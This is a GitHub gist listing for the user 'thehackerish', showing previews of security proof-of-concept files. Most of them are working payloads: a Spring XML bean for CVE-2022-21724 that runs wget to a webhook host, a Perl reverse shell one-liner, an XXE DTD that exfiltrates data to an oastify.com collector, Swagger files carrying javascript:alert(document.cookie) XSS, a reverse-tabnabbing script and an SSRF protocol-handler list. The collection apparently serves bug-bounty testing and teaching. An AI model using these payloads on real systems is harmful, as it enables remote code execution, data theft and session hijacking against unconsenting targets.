thehackerish thehackerish
thehackerish
/ cve-2022-21724.xml
Last active
April 7, 2022 10:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.org/dtd/spring-beans.dtd"> | |
| <beans xmlns="http://www.springframework.org/schema/beans" | |
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
| xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> | |
| <bean id="test" class="java.lang.ProcessBuilder"> | |
| <constructor-arg type="java.lang.String" index="0"><value>wget</value></constructor-arg> | |
| <constructor-arg type="java.lang.String" index="1"><value>https://webhook.site/08fc4b77-7e92-46c4-8f7a-fa3b76126698/123</value></constructor-arg> | |
| <property name="whatever" value="#{test.start()}"/> | |
| </bean> |
thehackerish
/ rce-poc.sh
Last active
August 30, 2022 10:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| perl -e 'use Socket;$i="127.0.0.1";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' |
thehackerish
/ boo.ps1
Created
February 16, 2021 13:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #requires -version 2 | |
| function New-InMemoryModule { | |
| <# | |
| .SYNOPSIS | |
| Creates an in-memory assembly and module | |
| Author: Matthew Graeber (@mattifestation) | |
| License: BSD 3-Clause |
thehackerish
/ swagger.json
Created
April 13, 2020 12:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: "2.0", | |
| info: | |
| title: "Swagger Sample App", | |
| description: "Please to click Terms of service" | |
| termsOfService: "javascript:alert(document.cookie)" | |
| contact: | |
| name: "API Support", | |
| url: "javascript:alert(document.cookie)", | |
| email: "javascript:alert(document.cookie)" | |
| version: "1.0.1" |
thehackerish
/ JavaDeserial.java
Last active
April 8, 2024 22:32
Supporting material for the Insecure Deserialization blog post https://thehackerish.com/insecure-deserialization-explained-with-examples
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.io.*; | |
| public class JavaDeserial{ | |
| public static void main(String args[]) throws Exception{ | |
| FileInputStream fis = new FileInputStream("/tmp/normalObj.serial"); | |
| ObjectInputStream ois = new ObjectInputStream(fis); | |
| NormalObj unserObj = (NormalObj)ois.readObject(); | |
| ois.close(); |
thehackerish
/ handlers
Created
July 17, 2019 08:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| acap | |
| afp | |
| dict | |
| dns | |
| file | |
| ftp | |
| git | |
| gopher | |
| http | |
| https |
thehackerish
/ re.html
Created
July 2, 2019 13:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> opener.location="https://www.google.com"</script> |
thehackerish
/ poc.dtd
Last active
September 29, 2022 17:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'http://fwfn5gywf26g6g92fpg6eoxdg4muaj.oastify.com/%data3;'>"> |
thehackerish
/ swagger.json
Created
January 8, 2019 13:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "apiVersion": "1.0", | |
| "apis": [{ | |
| "description": "Please to click Terms of service", | |
| "termsOfServiceUrl": "javascript:alert(document.cookie)", | |
| "path": "\/def\/", | |
| "position": 0 | |
| }], | |
| "authorizations": {}, |
thehackerish
/ foo.html
Created
January 8, 2019 12:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>alert(1)</script> |
NewerOlder